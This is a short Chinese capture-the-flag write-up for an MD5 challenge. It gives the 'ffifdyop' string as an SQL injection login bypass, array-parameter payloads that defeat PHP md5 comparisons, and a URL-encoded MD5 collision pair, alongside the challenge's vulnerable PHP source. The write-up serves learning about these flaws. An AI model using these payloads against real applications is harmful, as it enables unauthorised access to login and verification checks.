[SWPUCTF 2022 新生赛]奇妙的MD5

[SWPUCTF 2022 新生赛]奇妙的MD5 wp

题目页面：

提示：可曾听过ctf 中一个奇妙的字符串。

奇妙的字符串

奇妙的字符串，又跟 MD5 有关，我只知道两个：

一个是 MD5 加密后弱比较等于自身，这个字符串是 0e215962017 ：

另一个是 MD5 加密后变成万能密码，这个字符串是 ffifdyop ：

使用第二个字符串成功通过。

线索在源码里

通过上一关后，跳转到如下页面：

查看源代码：

MD5 弱比较

方法很多，这里用数组绕过，GET 传参：

?x[]=1&y[]=2

MD5 强比较

通过上一关后，跳转到新页面，内容如下：

<?php
error_reporting(0);
include "flag.php";highlight_file(__FILE__);if($_POST['wqh']!==$_POST['dsy']&&md5($_POST['wqh'])===md5($_POST['dsy'])){echo $FLAG;
} 

使用数组绕过，POST 传参 payload 如下：

wqh[]=1&dsy[]=2

返回结果：

使用 MD5 碰撞，POST 传参 payload 如下：

wqh=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&dsy=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

建议用 burp 发包，返回结果：